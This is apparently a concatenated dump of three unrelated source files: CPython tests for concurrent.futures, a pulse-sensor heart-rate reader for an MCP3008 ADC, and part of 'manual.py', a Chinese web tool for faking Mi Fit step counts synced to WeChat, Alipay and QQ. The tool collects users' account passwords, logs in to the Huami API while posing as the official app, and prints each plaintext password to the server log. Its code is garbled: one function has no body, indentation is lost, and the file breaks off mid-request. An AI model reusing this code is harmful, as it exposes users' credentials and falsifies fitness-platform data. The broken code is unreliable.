class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
    """Process-pool shutdown specifics: worker processes must terminate."""
    def _prime_executor(self):
        pass
    def test_processes_terminate(self):
        self.executor.submit(mul, 21, 2)
        self.executor.submit(mul, 6, 7)
        self.executor.submit(mul, 3, 14)
        # The process pool spawns all max_workers processes eagerly.
        self.assertEqual(len(self.executor._processes), 5)
        processes = self.executor._processes
        self.executor.shutdown()
        for p in processes.values():
            p.join()
    def test_context_manager_shutdown(self):
        with futures.ProcessPoolExecutor(max_workers=5) as e:
            processes = e._processes
            self.assertEqual(list(e.map(abs, range(-5, 5))),
                             [5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
        for p in processes.values():
            p.join()
    def test_del_shutdown(self):
        # Dropping the last reference must stop the management thread and
        # the worker processes.
        executor = futures.ProcessPoolExecutor(max_workers=5)
        list(executor.map(abs, range(-5, 5)))
        queue_management_thread = executor._queue_management_thread
        processes = executor._processes
        del executor
        queue_management_thread.join()
        for p in processes.values():
            p.join()
class WaitTests:
    """futures.wait() behaviour, parameterised over both executor types."""
    def test_first_completed(self):
        future1 = self.executor.submit(mul, 21, 2)
        future2 = self.executor.submit(time.sleep, 1.5)
        done, not_done = futures.wait(
                [CANCELLED_FUTURE, future1, future2],
                return_when=futures.FIRST_COMPLETED)
        self.assertEqual(set([future1]), done)
        self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
    def test_first_completed_some_already_completed(self):
        # Pre-finished fixtures satisfy FIRST_COMPLETED immediately.
        future1 = self.executor.submit(time.sleep, 1.5)
        finished, pending = futures.wait(
                 [CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
                 return_when=futures.FIRST_COMPLETED)
        self.assertEqual(
                set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
                finished)
        self.assertEqual(set([future1]), pending)
    def test_first_exception(self):
        future1 = self.executor.submit(mul, 2, 21)
        future2 = self.executor.submit(sleep_and_raise, 1.5)
        future3 = self.executor.submit(time.sleep, 3)
        finished, pending = futures.wait(
                [future1, future2, future3],
                return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([future1, future2]), finished)
        self.assertEqual(set([future3]), pending)
    def test_first_exception_some_already_complete(self):
        future1 = self.executor.submit(divmod, 21, 0)
        future2 = self.executor.submit(time.sleep, 1.5)
        finished, pending = futures.wait(
                [SUCCESSFUL_FUTURE,
                 CANCELLED_FUTURE,
                 CANCELLED_AND_NOTIFIED_FUTURE,
                 future1, future2],
                return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([SUCCESSFUL_FUTURE,
                              CANCELLED_AND_NOTIFIED_FUTURE,
                              future1]), finished)
        self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
    def test_first_exception_one_already_failed(self):
        future1 = self.executor.submit(time.sleep, 2)
        finished, pending = futures.wait(
                 [EXCEPTION_FUTURE, future1],
                 return_when=futures.FIRST_EXCEPTION)
        self.assertEqual(set([EXCEPTION_FUTURE]), finished)
        self.assertEqual(set([future1]), pending)
    def test_all_completed(self):
        future1 = self.executor.submit(divmod, 2, 0)
        future2 = self.executor.submit(mul, 2, 21)
        finished, pending = futures.wait(
                [SUCCESSFUL_FUTURE,
                 CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 future1,
                 future2],
                return_when=futures.ALL_COMPLETED)
        self.assertEqual(set([SUCCESSFUL_FUTURE,
                              CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              future1,
                              future2]), finished)
        self.assertEqual(set(), pending)
    def test_timeout(self):
        # A future sleeping past the timeout must be reported as pending.
        future1 = self.executor.submit(mul, 6, 7)
        future2 = self.executor.submit(time.sleep, 6)
        finished, pending = futures.wait(
                [CANCELLED_AND_NOTIFIED_FUTURE,
                 EXCEPTION_FUTURE,
                 SUCCESSFUL_FUTURE,
                 future1, future2],
                timeout=5,
                return_when=futures.ALL_COMPLETED)
        self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              SUCCESSFUL_FUTURE,
                              future1]), finished)
        self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
    def test_pending_calls_race(self):
        # Issue #14406: multi-threaded race condition when waiting on all
        # futures.
        event = threading.Event()
        def future_func():
            event.wait()
        # Shrink the switch interval to make the race far more likely.
        oldswitchinterval = sys.getswitchinterval()
        sys.setswitchinterval(1e-6)
        try:
            fs = {self.executor.submit(future_func) for i in range(100)}
            event.set()
            futures.wait(fs, return_when=futures.ALL_COMPLETED)
        finally:
            sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
    # All wait() tests inherited from WaitTests, run on a process pool.
    pass
class AsCompletedTests:
    """futures.as_completed() behaviour, shared by both executor suites."""
    # TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
    def test_no_timeout(self):
        future1 = self.executor.submit(mul, 2, 21)
        future2 = self.executor.submit(mul, 7, 6)
        completed = set(futures.as_completed(
            [CANCELLED_AND_NOTIFIED_FUTURE,
             EXCEPTION_FUTURE,
             SUCCESSFUL_FUTURE,
             future1, future2]))
        self.assertEqual(set(
            [CANCELLED_AND_NOTIFIED_FUTURE,
             EXCEPTION_FUTURE,
             SUCCESSFUL_FUTURE,
             future1, future2]),
            completed)
    def test_zero_timeout(self):
        # With timeout=0 only already-done futures are yielded before
        # TimeoutError fires.
        future1 = self.executor.submit(time.sleep, 2)
        completed_futures = set()
        try:
            for future in futures.as_completed(
                    [CANCELLED_AND_NOTIFIED_FUTURE,
                     EXCEPTION_FUTURE,
                     SUCCESSFUL_FUTURE,
                     future1],
                    timeout=0):
                completed_futures.add(future)
        except futures.TimeoutError:
            pass
        self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
                              EXCEPTION_FUTURE,
                              SUCCESSFUL_FUTURE]),
                         completed_futures)
    def test_duplicate_futures(self):
        # Issue 20367. Duplicate futures should not raise exceptions or give
        # duplicate responses.
        future1 = self.executor.submit(time.sleep, 2)
        completed = [f for f in futures.as_completed([future1,future1])]
        self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
    # Inherited as_completed() tests, run on a thread pool.
    pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
    # Inherited as_completed() tests, run on a process pool.
    pass
class ExecutorTest:
    """submit()/map() behaviour shared by both executor suites."""
    # Executor.shutdown() and context manager usage is tested by
    # ExecutorShutdownTest.
    def test_submit(self):
        future = self.executor.submit(pow, 2, 8)
        self.assertEqual(256, future.result())
    def test_submit_keyword(self):
        future = self.executor.submit(mul, 2, y=8)
        self.assertEqual(16, future.result())
    def test_map(self):
        self.assertEqual(
            list(self.executor.map(pow, range(10), range(10))),
            list(map(pow, range(10), range(10))))
    def test_map_exception(self):
        # The exception surfaces when iteration reaches the failed call.
        i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
        self.assertEqual(i.__next__(), (0, 1))
        self.assertEqual(i.__next__(), (0, 1))
        self.assertRaises(ZeroDivisionError, i.__next__)
    def test_map_timeout(self):
        results = []
        try:
            for i in self.executor.map(time.sleep,
                                       [0, 0, 6],
                                       timeout=5):
                results.append(i)
        except futures.TimeoutError:
            pass
        else:
            self.fail('expected TimeoutError')
        self.assertEqual([None, None], results)
    def test_shutdown_race_issue12456(self):
        # Issue #12456: race condition at shutdown where trying to post a
        # sentinel in the call queue blocks (the queue is full while processes
        # have exited).
        self.executor.map(str, [2] * (self.worker_count + 1))
        self.executor.shutdown()
    @test.support.cpython_only
    def test_no_stale_references(self):
        # Issue #16284: check that the executors don't unnecessarily hang onto
        # references.
        my_object = MyObject()
        my_object_collected = threading.Event()
        my_object_callback = weakref.ref(
            my_object, lambda obj: my_object_collected.set())
        # Deliberately discarding the future.
        self.executor.submit(my_object.my_method)
        del my_object
        collected = my_object_collected.wait(timeout=5.0)
        self.assertTrue(collected,
                        "Stale reference not collected within timeout.")
    def test_max_workers_negative(self):
        for number in (0, -1):
            with self.assertRaisesRegex(ValueError,
                                        "max_workers must be greater "
                                        "than 0"):
                self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
    def test_map_submits_without_iteration(self):
        """Tests verifying issue 11777."""
        finished = []
        def record_finished(n):
            finished.append(n)
        # map() must submit all work even if its iterator is never consumed.
        self.executor.map(record_finished, range(10))
        self.executor.shutdown(wait=True)
        self.assertCountEqual(finished, range(10))
    def test_default_workers(self):
        executor = self.executor_type()
        self.assertEqual(executor._max_workers,
                         (os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
    def test_killed_child(self):
        # When a child process is abruptly terminated, the whole pool gets
        # "broken".
        futures = [self.executor.submit(time.sleep, 3)]
        # Get one of the processes, and terminate (kill) it
        p = next(iter(self.executor._processes.values()))
        p.terminate()
        for fut in futures:
            self.assertRaises(BrokenProcessPool, fut.result)
        # Submitting other jobs fails as well.
        self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
    def test_map_chunksize(self):
        def bad_map():
            list(self.executor.map(pow, range(40), range(40), chunksize=-1))
        ref = list(map(pow, range(40), range(40)))
        self.assertEqual(
            list(self.executor.map(pow, range(40), range(40), chunksize=6)),
            ref)
        self.assertEqual(
            list(self.executor.map(pow, range(40), range(40), chunksize=50)),
            ref)
        self.assertEqual(
            list(self.executor.map(pow, range(40), range(40), chunksize=40)),
            ref)
        self.assertRaises(ValueError, bad_map)
    # NOTE: the trailing "# some comment" below is asserted on verbatim in
    # test_traceback; do not remove or reword it.
    @classmethod
    def _test_traceback(cls):
        raise RuntimeError(123) # some comment
    def test_traceback(self):
        # We want ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
        future = self.executor.submit(self._test_traceback)
        with self.assertRaises(Exception) as cm:
            future.result()
        exc = cm.exception
        self.assertIs(type(exc), RuntimeError)
        self.assertEqual(exc.args, (123,))
        cause = exc.__cause__
        self.assertIs(type(cause), futures.process._RemoteTraceback)
        self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
        with test.support.captured_stderr() as f1:
            try:
                raise exc
            except RuntimeError:
                sys.excepthook(*sys.exc_info())
        self.assertIn('raise RuntimeError(123) # some comment',
                      f1.getvalue())
class FutureTests(unittest.TestCase):
    """Direct tests of Future's callbacks, state machine and blocking API."""
    def test_done_callback_with_result(self):
        callback_result = None
        def fn(callback_future):
            nonlocal callback_result
            callback_result = callback_future.result()
        f = Future()
        f.add_done_callback(fn)
        f.set_result(5)
        self.assertEqual(5, callback_result)
    def test_done_callback_with_exception(self):
        callback_exception = None
        def fn(callback_future):
            nonlocal callback_exception
            callback_exception = callback_future.exception()
        f = Future()
        f.add_done_callback(fn)
        f.set_exception(Exception('test'))
        self.assertEqual(('test',), callback_exception.args)
    def test_done_callback_with_cancel(self):
        was_cancelled = None
        def fn(callback_future):
            nonlocal was_cancelled
            was_cancelled = callback_future.cancelled()
        f = Future()
        f.add_done_callback(fn)
        self.assertTrue(f.cancel())
        self.assertTrue(was_cancelled)
    def test_done_callback_raises(self):
        # A raising callback is logged to stderr and must not prevent
        # later callbacks from running.
        with test.support.captured_stderr() as stderr:
            raising_was_called = False
            fn_was_called = False
            def raising_fn(callback_future):
                nonlocal raising_was_called
                raising_was_called = True
                raise Exception('doh!')
            def fn(callback_future):
                nonlocal fn_was_called
                fn_was_called = True
            f = Future()
            f.add_done_callback(raising_fn)
            f.add_done_callback(fn)
            f.set_result(5)
            self.assertTrue(raising_was_called)
            self.assertTrue(fn_was_called)
            self.assertIn('Exception: doh!', stderr.getvalue())
    def test_done_callback_already_successful(self):
        # Callbacks added after completion run immediately.
        callback_result = None
        def fn(callback_future):
            nonlocal callback_result
            callback_result = callback_future.result()
        f = Future()
        f.set_result(5)
        f.add_done_callback(fn)
        self.assertEqual(5, callback_result)
    def test_done_callback_already_failed(self):
        callback_exception = None
        def fn(callback_future):
            nonlocal callback_exception
            callback_exception = callback_future.exception()
        f = Future()
        f.set_exception(Exception('test'))
        f.add_done_callback(fn)
        self.assertEqual(('test',), callback_exception.args)
    def test_done_callback_already_cancelled(self):
        was_cancelled = None
        def fn(callback_future):
            nonlocal was_cancelled
            was_cancelled = callback_future.cancelled()
        f = Future()
        self.assertTrue(f.cancel())
        f.add_done_callback(fn)
        self.assertTrue(was_cancelled)
    def test_repr(self):
        self.assertRegex(repr(PENDING_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=pending>')
        self.assertRegex(repr(RUNNING_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=running>')
        self.assertRegex(repr(CANCELLED_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=cancelled>')
        self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
                         '<Future at 0x[0-9a-f]+ state=cancelled>')
        self.assertRegex(
            repr(EXCEPTION_FUTURE),
            '<Future at 0x[0-9a-f]+ state=finished raised OSError>')
        self.assertRegex(
            repr(SUCCESSFUL_FUTURE),
            '<Future at 0x[0-9a-f]+ state=finished returned int>')
    def test_cancel(self):
        # cancel() only succeeds before the future starts running; on an
        # already-cancelled future it succeeds without changing state.
        f1 = create_future(state=PENDING)
        f2 = create_future(state=RUNNING)
        f3 = create_future(state=CANCELLED)
        f4 = create_future(state=CANCELLED_AND_NOTIFIED)
        f5 = create_future(state=FINISHED, exception=OSError())
        f6 = create_future(state=FINISHED, result=5)
        self.assertTrue(f1.cancel())
        self.assertEqual(f1._state, CANCELLED)
        self.assertFalse(f2.cancel())
        self.assertEqual(f2._state, RUNNING)
        self.assertTrue(f3.cancel())
        self.assertEqual(f3._state, CANCELLED)
        self.assertTrue(f4.cancel())
        self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
        self.assertFalse(f5.cancel())
        self.assertEqual(f5._state, FINISHED)
        self.assertFalse(f6.cancel())
        self.assertEqual(f6._state, FINISHED)
    def test_cancelled(self):
        self.assertFalse(PENDING_FUTURE.cancelled())
        self.assertFalse(RUNNING_FUTURE.cancelled())
        self.assertTrue(CANCELLED_FUTURE.cancelled())
        self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
        self.assertFalse(EXCEPTION_FUTURE.cancelled())
        self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
    def test_done(self):
        self.assertFalse(PENDING_FUTURE.done())
        self.assertFalse(RUNNING_FUTURE.done())
        self.assertTrue(CANCELLED_FUTURE.done())
        self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
        self.assertTrue(EXCEPTION_FUTURE.done())
        self.assertTrue(SUCCESSFUL_FUTURE.done())
    def test_running(self):
        self.assertFalse(PENDING_FUTURE.running())
        self.assertTrue(RUNNING_FUTURE.running())
        self.assertFalse(CANCELLED_FUTURE.running())
        self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
        self.assertFalse(EXCEPTION_FUTURE.running())
        self.assertFalse(SUCCESSFUL_FUTURE.running())
    def test_result_with_timeout(self):
        self.assertRaises(futures.TimeoutError,
                          PENDING_FUTURE.result, timeout=0)
        self.assertRaises(futures.TimeoutError,
                          RUNNING_FUTURE.result, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_FUTURE.result, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
        self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
        self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
    def test_result_with_success(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
        def notification():
            # Wait until the main thread is waiting for the result.
            time.sleep(1)
            f1.set_result(42)
        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()
        self.assertEqual(f1.result(timeout=5), 42)
    def test_result_with_cancel(self):
        # TODO(brian@sweetapp.com): This test is timing dependent.
        def notification():
            # Wait until the main thread is waiting for the result.
            time.sleep(1)
            f1.cancel()
        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()
        self.assertRaises(futures.CancelledError, f1.result, timeout=5)
    def test_exception_with_timeout(self):
        self.assertRaises(futures.TimeoutError,
                          PENDING_FUTURE.exception, timeout=0)
        self.assertRaises(futures.TimeoutError,
                          RUNNING_FUTURE.exception, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_FUTURE.exception, timeout=0)
        self.assertRaises(futures.CancelledError,
                          CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
        self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
                                   OSError))
        self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
    def test_exception_with_success(self):
        def notification():
            # Wait until the main thread is waiting for the exception.
            time.sleep(1)
            with f1._condition:
                f1._state = FINISHED
                f1._exception = OSError()
                f1._condition.notify_all()
        f1 = create_future(state=PENDING)
        t = threading.Thread(target=notification)
        t.start()
        self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
    """Run every test case in this module, reaping stray children after."""
    try:
        test.support.run_unittest(__name__)
    finally:
        test.support.reap_children()
# Allow running this test module directly, outside the regrtest driver.
if __name__ == "__main__":
    test_main()
|
pulsesensor.py | # extended from https://github.com/WorldFamousElectronics/PulseSensor_Amped_Arduino
import time
import threading
from MCP3008 import MCP3008
class Pulsesensor:
    """Read a pulse sensor through an MCP3008 ADC and derive heart rate.

    Ported from the WorldFamousElectronics PulseSensor Arduino sketch.
    After startAsyncBPM() a background thread continuously updates
    ``self.BPM`` (0 means no beat detected yet / signal lost).
    """
    def __init__(self, channel = 0, bus = 0, device = 0):
        # channel: ADC input the sensor is wired to; bus/device select the
        # SPI interface passed to MCP3008.
        self.channel = channel
        self.BPM = 0
        self.adc = MCP3008(bus, device)
    def getBPMLoop(self):
        """Beat-detection loop run on the background thread.

        Thresholds are seeded around 512 (mid-scale), which presumably
        matches the ADC's range -- TODO confirm against MCP3008.read().
        """
        # init variables
        rate = [0] * 10                  # array to hold last 10 IBI values
        sampleCounter = 0                # used to determine pulse timing
        lastBeatTime = 0                 # used to find IBI
        P = 512                          # used to find peak in pulse wave, seeded
        T = 512                          # used to find trough in pulse wave, seeded
        thresh = 525                     # used to find instant moment of heart beat, seeded
        amp = 100                        # used to hold amplitude of pulse waveform, seeded
        firstBeat = True                 # used to seed rate array so we startup with reasonable BPM
        secondBeat = False               # used to seed rate array so we startup with reasonable BPM
        IBI = 600                        # int that holds the time interval between beats! Must be seeded!
        Pulse = False                    # "True" when User's live heartbeat is detected. "False" when not a "live beat".
        lastTime = int(time.time()*1000)
        # Loop until stopAsyncBPM() sets the stop flag on the thread.
        while not self.thread.stopped:
            Signal = self.adc.read(self.channel)
            #print("raw data", Signal)
            currentTime = int(time.time()*1000)
            sampleCounter += currentTime - lastTime
            lastTime = currentTime
            N = sampleCounter - lastBeatTime    # ms since the last beat
            # find the peak and trough of the pulse wave
            if Signal < thresh and N > (IBI/5.0)*3:     # avoid dichrotic noise by waiting 3/5 of last IBI
                if Signal < T:                          # T is the trough
                    T = Signal                          # keep track of lowest point in pulse wave
            if Signal > thresh and Signal > P:
                P = Signal
            # signal surges up in value every time there is a pulse
            if N > 250:                                 # avoid high frequency noise
                if Signal > thresh and Pulse == False and N > (IBI/5.0)*3:
                    Pulse = True                        # set the Pulse flag when we think there is a pulse
                    IBI = sampleCounter - lastBeatTime  # measure time between beats in mS
                    lastBeatTime = sampleCounter        # keep track of time for next pulse
                    if secondBeat:                      # if this is the second beat, if secondBeat == TRUE
                        secondBeat = False;             # clear secondBeat flag
                        for i in range(len(rate)):      # seed the running total to get a realisitic BPM at startup
                            rate[i] = IBI
                    if firstBeat:                       # if it's the first time we found a beat, if firstBeat == TRUE
                        firstBeat = False;              # clear firstBeat flag
                        secondBeat = True;              # set the second beat flag
                        continue
                    # keep a running total of the last 10 IBI values
                    rate[:-1] = rate[1:]                # shift data in the rate array
                    rate[-1] = IBI                      # add the latest IBI to the rate array
                    runningTotal = sum(rate)            # add upp oldest IBI values
                    runningTotal /= len(rate)           # average the IBI values
                    self.BPM = 60000/runningTotal       # how many beats can fit into a minute? that's BPM!
            if Signal < thresh and Pulse == True:       # when the values are going down, the beat is over
                Pulse = False                           # reset the Pulse flag so we can do it again
                amp = P - T                             # get amplitude of the pulse wave
                thresh = amp/2 + T                      # set thresh at 50% of the amplitude
                P = thresh                              # reset these for next time
                T = thresh
            if N > 2500:                                # if 2.5 seconds go by without a beat
                thresh = 512                            # set thresh default
                P = 512                                 # set P default
                T = 512                                 # set T default
                lastBeatTime = sampleCounter            # bring the lastBeatTime up to date
                firstBeat = True                        # set these to avoid noise
                secondBeat = False                      # when we get the heartbeat back
                self.BPM = 0
            time.sleep(0.005)
    # Start getBPMLoop routine which saves the BPM in its variable
    def startAsyncBPM(self):
        # The stop flag lives on the thread object itself and is polled by
        # getBPMLoop().
        self.thread = threading.Thread(target=self.getBPMLoop)
        self.thread.stopped = False
        self.thread.start()
        return
    # Stop the routine
    def stopAsyncBPM(self):
        # NOTE(review): raises AttributeError if called before
        # startAsyncBPM(); the thread is signalled but not joined.
        self.thread.stopped = True
        self.BPM = 0
        return
|
manual.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# author:acloudtwei
# FileName:weisport-manual
# createdate:2022/02/23
# SoftWare: PyCharm
import weipyweb
from weipyweb.input import *
from weipyweb.output import *
import requests, time, re, random
import redis
from apscheduler.schedulers.blocking import BlockingScheduler
import tornado.web
import tornado.ioloop
from weipyweb.platform.tornado import webio_handler
import threading
# Redis connection; the 'redis' hostname is resolved by the deployment
# environment (e.g. a docker network).  NOTE(review): ``pool`` is created
# but never passed to the Redis client below -- confirm it is needed.
pool = redis.ConnectionPool(host='redis', port=6379, decode_responses=True)
r = redis.Redis(host='redis', port=6379, decode_responses=True)
# Put your token from https://www.pushplus.plus/ here (used to push
# step-count results to followers).
Push_Token = "填写你的token"
def xiaomihelp():
    """Render the static help/tutorial page for the Mi Fit step tool.

    Pure presentation: emits inline HTML plus screenshots from ./img.
    All user-facing text is Chinese and must stay byte-identical.
    NOTE(review): the image files opened below are never closed.
    """
    STATIC_PATH = "./img"
    put_html("<h1 style='color:skyblue'>运动刷步数助手小米教程</h1>").style("text-align:center")
    put_html("<h2 style='color:red'>运动刷步数助手小米账号密码登录</h2>").style("text-align:center")
    put_html("<h3 style='color:#FF8C00'>1.从应用商店下载小米运动App,打开软件并选择没有账号立即注册。</h3>").style("text-align:center")
    img1 = open(STATIC_PATH + '/1.png', 'rb').read()
    put_image(img1, width="70%").style("display:block").style("margin:0 auto")
    put_html("<h3 style='color:#FF8C00'>2.登录之后,点击我的->第三方接入->绑定你想同步数据的账号。</h3>").style("text-align:center")
    put_html("<p style='color:gray;font-size:13px'>(<span style='color:red'>VX</span>没有刷上就取消共享取消公众号关注重新绑定)</p>").style(
        "text-align:center")
    put_html("<p style='color:gray;font-size:13px'>(<span style='color:red'>ZFB</span>没有刷上就解绑重新绑定)</p>").style(
        "text-align:center")
    put_html("<p style='color:gray;font-size:13px'>(小米运动暂时不支持QQ排行榜同步)</p>").style("text-align:center")
    img2 = open(STATIC_PATH + '/2.png', 'rb').read()
    put_image(img2, width="70%").style("display:block").style("margin:0 auto")
    put_html("<h3 style='color:#FF8C00'>3.回到运动刷步数助手网站,直接输入你的账号密码以及需要刷的步数,然后提交步数。</h3>").style(
        "text-align:center")
    img3 = open(STATIC_PATH + '/3.jpg', 'rb').read()
    put_image(img3, width="70%").style("display:block").style("margin:0 auto")
    put_html("<h1 style='color:#DC143C'>----------分割线----------</h1>").style("text-align:center")
    put_html("<h3 style='color:#DC143C'>PS:密码明明对的但运动助手提示小米运动密码错误解决方法</h3>").style("text-align:center")
    put_html("<h3 style='color:#FF8C00'>1.我的-设置-退出登录退出。(小米运动APP)</h3>").style("text-align:center")
    img4 = open(STATIC_PATH + '/4.png', 'rb').read()
    put_image(img4, width="70%").style("display:block").style("margin:0 auto")
    put_html("<h3 style='color:#FF8C00'>2.退出到APP首页,忘记密码-输入手机号和短信验证码-输入新密码(修改密码),设置你自己记得住的密码。</h3>").style(
        "text-align:center")
    img5 = open(STATIC_PATH + '/5.png', 'rb').read()
    put_image(img5, width="70%").style("display:block").style("margin:0 auto")
    put_html("<h3 style='color:#FF8C00'>3.修改密码成功以后,返回运动刷步数助手再次尝试刷步。</h3>").style(
        "text-align:center")
    put_html("<h1 style='color:#0000FF'>----------分割线----------</h1>").style("text-align:center")
    put_html("<h2 style='color:red'>所有问题解答:</h2>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:为什么我提交了微信却显示0步?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:没有关联成功、或者微信运动被封。</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:用修改步数会封号吗?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:不会 如果刷的步数过多会封微信运动 等7天后解封就好了</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:为什么我滑块验证码提交了却提示成功?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:代理问题,多提交几次就好了。</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:为什么我支付宝同步成功了,微信却是0步?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:微信没有关联成功、或者微信运动被封。</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:微信运动被封了怎么办?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:解绑微信,关闭微信运动,等7天自动解封。</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:为什么QQ不同步步数?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:QQ有延迟,过一会再看不行的话多提交几次。</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>问:为什么我QQ扫码被冻结了?</h4>").style("text-align:center")
    put_html("<h4 style='color:#00CED1'>答:服务器在成都所以会异地登录导致QQ被冻结 改密码就好了。</h4>").style("text-align:center")
    put_link("点击返回", url="/").style("display:flex").style("justify-content:center").style("align-item:center").style(
        "color:skyblue")
def mi(): # 这里可以获取请求过来的是数据
def judge_phone(tel):
    """Validate a Chinese mainland mobile number for the pywebio input field.

    Returns an error message string when invalid, or None (implicitly) when
    valid -- the convention pywebio `validate=` callbacks expect.
    """
    tel = str(tel)
    # 1[3-9]\d{9} covers all assigned CN mobile prefixes. The original
    # pattern 1[35789] wrongly rejected valid 14x and 16x numbers.
    if re.fullmatch(r"1[3-9]\d{9}", tel) is None:
        return "你输入的账号有误,请输入小米运动的账号(手机号)!"
def no_empty_str(num):
    """Reject empty text input; return None (valid) for anything else."""
    return "请不要输入空数据!" if len(num) == 0 else None
def no_empty_num(num):
    """Range-check the requested step count; 0..90000 inclusive is accepted."""
    if num < 0:
        return "输入负数你想干嘛呢你!?"
    if num > 90000:
        return "刷这么多我怕你会封号!!!"
    return None
# Collect the account, password and desired step count from the web form.
put_link("不会用?点这里", url="/help", new_window=True).style("color:red")
info = input_group("运动刷步数助手(小米运动版)", [
input('小米运动账号:', name='phones', type=NUMBER, validate=judge_phone, placeholder="请输入账号(手机号)!"),
input('小米运动密码:', name='psws', type=PASSWORD, placeholder="请输入密码!", validate=no_empty_str),
input('修改的步数:', name='steps', type=NUMBER, placeholder="请输入要修改的步数!", validate=no_empty_num),
])
# NOTE(review): this prints the plaintext password to the server log --
# consider removing for privacy.
print(info['phones'], info['psws'], info['steps'])
phones = info['phones']
psws = info['psws']
steps = info['steps']
# Timestamp used by push notifications later in this request.
now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
# Default headers for the Huami time/token endpoints (Android client UA).
headers = {
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 9; MI 6 MIUI/20.6.18)'
}
# Obtain the login access code from the redirect URL
def get_code(location):
    """Extract the access code embedded in a redirect Location URL.

    The code sits between 'access=' and the next '&'; raises IndexError
    when no code is present (the caller treats that as a failed login).
    """
    matches = re.findall("(?<=access=).*?(?=&)", location)
    return matches[0]
# Log in
def login(user, password):
# Authenticate against the Huami (Mi Fit) account service.
# Returns (login_token, user_id) on success, or (0, 0) when no redirect
# Location / access code could be obtained (bad credentials).
url1 = "https://api-user.huami.com/registrations/+86" + user + "/tokens"
# Headers mimicking the official iOS Mi Fit client. This local dict
# shadows the outer Dalvik-UA `headers` and is reused for both requests.
headers = {
"Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
"User-Agent": "MiFit/4.6.0 (iPhone; iOS 14.0.1; Scale/2.00)"
}
data1 = {
"client_id": "HuaMi",
"password": f"{password}",
"redirect_uri": "https://s3-us-west-2.amazonaws.com/hm-registration/successsignin.html",
"token": "access"
}
# allow_redirects=False so the access code can be read straight from the
# redirect Location header instead of following it.
r1 = requests.post(url1, data=data1, headers=headers, allow_redirects=False)
try:
location = r1.headers["Location"]
code = get_code(location)
except:
# NOTE(review): bare except also hides programming errors; (0, 0) is the
# sentinel main() checks to report a failed login.
return 0, 0
# print("access_code fetched OK!")
# print(code)
url2 = "https://account.huami.com/v2/client/login"
data2 = {
"app_name": "com.xiaomi.hm.health",
"app_version": "4.6.0",
"code": f"{code}",
"country_code": "CN",
"device_id": "2C8B4939-0CCD-4E94-8CBA-CB8EA6E613A1",
"device_model": "phone",
"grant_type": "access_token",
"third_name": "huami_phone",
